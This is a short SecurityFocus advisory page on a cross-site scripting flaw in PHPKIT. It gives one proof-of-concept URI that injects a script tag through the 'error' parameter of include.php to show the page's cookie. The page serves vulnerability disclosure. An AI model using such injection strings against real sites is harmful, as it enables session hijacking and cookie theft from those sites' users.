info
discussion
exploit
solution
references
PHPKIT Cross-Site Scripting Vulnerability
An exploit is not required.
An example URI has been provided:
http://www.example.com/include.php?path=login/login.php&error=<script>alert(document.Cookie)</script>
Privacy Statement
Copyright 2010, SecurityFocus
